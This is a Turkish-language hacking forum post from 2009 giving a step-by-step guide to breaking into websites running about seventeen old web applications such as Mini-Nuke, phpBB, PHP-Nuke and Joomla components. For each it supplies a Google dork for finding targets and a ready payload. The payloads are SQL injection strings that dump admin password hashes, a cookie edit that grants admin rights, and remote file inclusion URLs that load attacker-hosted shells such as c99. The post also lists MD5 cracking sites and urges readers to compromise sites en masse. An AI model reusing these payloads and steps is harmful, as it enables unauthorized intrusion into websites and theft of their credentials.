Real Felaket

Web Sitemiden Yararlana Bilmek İçin Lütfen Üye Olunuz

Join the forum, it's quick and easy

Real Felaket

Web Sitemiden Yararlana Bilmek İçin Lütfen Üye Olunuz

Real Felaket

Would you like to react to this message? Create an account in a few clicks or log in to continue.
Real Felaket

    Hangi Site Nasıl Hacklenir Detaylı Anlatım

    Fakelove
    Fakelove
    G.K BAŞKANI
    G.K BAŞKANI


    Mesaj Sayısı : 145
    Kayıt tarihi : 17/06/09
    Yaş : 33
    Nerden : Nereye

    Hangi Site Nasıl Hacklenir Detaylı Anlatım Empty Hangi Site Nasıl Hacklenir Detaylı Anlatım

    Mesaj tarafından Fakelove Paz Haz. 21, 2009 1:16 am

    Bi Zahmet Okuduktan Sonra Cevap Yazın O Kadar Emek Harcıyoruz


    Hangi site nasil hacklenir....

    --------------------------------------------------------------------------------
    -MİNİ NUKE V2.3

    Mini nuke sitelerle uğraşmak için ilk önce

    wwww.Google.com a giriyoruz ve: ’mini-nuke v2.3’ olarak aratıyoruz.

    Karşımıza gelen sitelerin sonuna

    :/pages.asp?id=3%20union+select+ 0*kul_adi*sifre*0*0+ from+members+where+uye_id=1

    Kodunu ekliyoruz ve karşımıza adminin md5 i çıkıyor.

    MD5 i kırmak içinde

    http://passcrack.spb.ru
    http://gdataonline.com
    http://us.md5.crysm.net
    http://md5.rednoize.com
    http://ice.breaker.free.fr
    http://www.milw0rm.com/md5/
    http://shm.hard-core.pl/md5/
    http://www.hashchecker.com
    http://lasecwww.epfl.ch/%7Eoechslin/projects/ophcrack/
    http://md5.benramsey.com
    http://md5.altervista.org
    http://shm.hard-core.pl
    http://plain-text.info
    www.md5lookup.com
    www.passcracking.ru
    www.md5lookup.com
    www.passcracking.ru/
    http://www.securitystats.com/tools/hashcrack.php

    ---------------------------------------------------------------------------

    -VİRTUAL WAR V.1.0

    ilk önce www.google.com ’Powered by: Virtual War v1.5.0’

    Sonu /war.php olan siteleri seçiyoruz ve

    war.php kısmı siliyoruz ’includes/get_header.php?vwar_root=http: http://www.tuningclub.ch/config.dat?’ kodunu ekliyoruz.

    Artık admin palenelindeyiz

    [Eski bir açık olduğu için sonuç alamayabilirsiniz]


    ---------------------------------------------------------------------------
    ---
    -PHPBB 2.0.11

    işte meşhur phpbb açığı

    Bize gereken en önemli program :

    http://www.topshareware.com/cookie-E...nsfer-4659.htm [Cooike Editör]

    Kurban sitemizi seçiyoruz ve üye oluyoruz üye girşi yaparken ’BENİ HATIRLA’ diyoruz ve siteye giriyoruz.

    Daha sonra cooike editörümüzü açıyoruz önümüze şimdiye kadar girdiğimiz sitelerin isimler gelicek biz bunların arasından

    kurban phpbb 2.0.11 sitemizi seçicez.

    Sitemizi bulduk 2 kez tıklıyoruz.

    Önümüze a%3A2%3A%7Bs%3A11%3A“autolog inid“%3Bs%3A0%3A%2 2“%3Bs%3A6%3A“userid“%3B s%3A1%3A“2“%3B%7D Gibi Abudik

    Kubidik Kodlar Gelicek Üssteki Kodu Slip

    a%3A2%3A%7Bs%3A11%3A“autolog inid“%3Bb%3A1%3Bs% 3A6%3A“userid“%3Bs%3A1%3A% 222“%3B%7D Bu kodu yeryeştiriyoruz

    Saveliyoruz.

    Artık cooike editör ile işimiz bitti

    Sitemizi yeniliyoruz bakıyoruz aaaa adminiz


    ---------------------------------------------------------------------------
    -----
    -PHP NUKE SQL INJECTİON

    www.googLe.com a giriyoruz aranacak kelimeye

    ’PHP-Nuke Copyright ©️ 2004 by Francisco Burzi’ yazıyoruz.

    Bulduğumuz sitenin search bölümüne ’p0gg0nsee%’) UNION ALL SELECT 1*2*aid*pwd*5*6*7*8*9*10 FROM nuke_authors/*’ yazmamız kafi

    Search bölümünü bulamadıysanız

    www.hackleneceksite.com/modules.php?name=Search

    Adminin hashı çıkıyor bunu kırıyoruz dökümanın en üstünde adresleri werdim.


    ---------------------------------------------------------------------------
    ------
    -COM_REMOSİTORY

    wWW.Google.com ’’inurl:"com_remository"

    Bulduğumuz sitelere

    http://[sitepath]/[joomlapat....php?mosConfig _absolute_path=http://site/phpshell.php

    Kodunu ekliyoruz...

    ---------------------------------------------------------------------------
    -----------
    -XOOPs MYADS MODULE SQL-INJECTİON VULNERABİLİT

    WWW.Google.Com ’inurl:modules/myAds/’

    Karşımıza çıkan siteleri şu şekilde değiştiriyoruz.

    http://www.site.com/modules/myAds/an...rs+limit+1*1/*

    Ve önümüze tekrar md5 ler çıkıyor bunları kırmak artık size kalmış...

    ---------------------------------------------------------------------------
    -------------
    -TOPLİST HACK PHPBB

    GoogLe Arama : inurl:"toplist.php" "powered by phpbb"


    Exploit: /toplist.php?f=toplist_top10&ph pbb_root_path=http://yourhost/cmd.gif?cmd=ls


    ---------------------------------------------------------------------------
    --------------
    - PC_COOKBOOK JOOMLA COMPONENT

    - pc_cookbook Joomla Component <= v0.3 Remote File Include Vulnerabilities

    - Author: JaheeMCreW

    - Uygulama : pc_cookbook Component

    - Version : koyans 0.3

    Yapmaniz gereken bir arama moturunda örnek google’ da

    " allinurl:com_pccookbook " olarak aratmaktir..

    Exploit :

    http://[target]/[path]/compo...osConfig_absol ute_path=http://evilscript


    ---------------------------------------------------------------------------
    -------------
    -SİMPLE BOARD MAMBO

    İlk Önce WwwW.GoogLe.com

    Daha Sonra Karşımıza Gelen Sitelere şu expolit i ekliyoruz...

    http://site.com/components/com_simpl...me%20-a;id;pwd


    ---------------------------------------------------------------------------
    -------------
    -ShoutBox IncLusion

    shoutBox KuruLu SistemLerde Remote FiLe IncLusion Acigi Var...

    Code:

    /shoutbox/expanded.php?conf=


    GoogLe Arama : inurl:"/shoutbox/expanded.php?"

    ---------------------------------------------------------------------------
    --------------
    -PHPBAZAR <= 2.1.0 Remote File INCLLUSION

    Google Search=inurl:classified.php phpbazar

    http://hedefsite.com/classified_righ...ell.txt?cmd=id


    ---------------------------------------------------------------------------
    ---------------
    -BoastMachine [bmachine]

    yeni gözde blog sistemi olan bmachine’in 2.8 versiyonunda bulunan ufak bi açık :

    site adresinden sonra index.php?id=../config.php yazıyoruz ve kaynak bölümüne bakınca adminin

    şifresini görüyoruz : )


    ---------------------------------------------------------------------------
    ----------------
    -Limbo CMS <= 1.04 Remote File Inclusion

    GoogLe Arama : inurl:"index2.php?option=rss" OR "powered By Limbo CMS"


    Exploit: /classes/adodbt/sql.php?classes_dir=http://yourhost/cmd.gif?cmd=ls
    ---------------------------------------------------------------------------
    -----------------
    -CaLogic Calendars V1.2.2 - Remote File Include

    GoogLe Arama : CaLogic Calendars V1.2.2

    kullanmak için :

    http://site.com/[path]/reconfig....1;evil_script]
    http://site.com/[path]/srxclr.ph...1;evil_script]


    ---------------------------------------------------------------------------
    ------------------
    -PafileDB Remote File Inclusion [phpBB]

    PhpBB SiteLerde PafileDB ’deki aciktan yararLanarak Remote kodlar calistirmaniza yariyor..


    http://www.site.com/ [phpBBpath]/[pafiledbpath] /includes/pafiledb_constants.php?module_ root_path= http://[attacker]


    ---------------------------------------------------------------------------
    -------------------
    -JetBox CMS Remote File Include [ RFI ]

    Acik henuz Yeni cikti.. ve bu yuzden herzaman ki gibi milyonlarca site hackLeme sansiniz var..

    Uretici Firma : http://jetbox.streamedge.com/

    JetBox CMS Remote File Include

    http://[domain] /includes/phpdig/includes/config.php?relative_script_pat h=shell URL adresiniz..

    GoogLe arama : Powered by Jetbox

    ---------------------------------------------------------------------------
    ---------------------


    Aratma Kodu : PHP Upload Center v2.0
    Shell : activate.php?language=conf&footerpage=http://melll.by.ru/c99.txt?

    -
    Emeğe Saygı Göstermeinzi Umuyorum

      Forum Saati Paz Mayıs 19, 2024 8:52 pm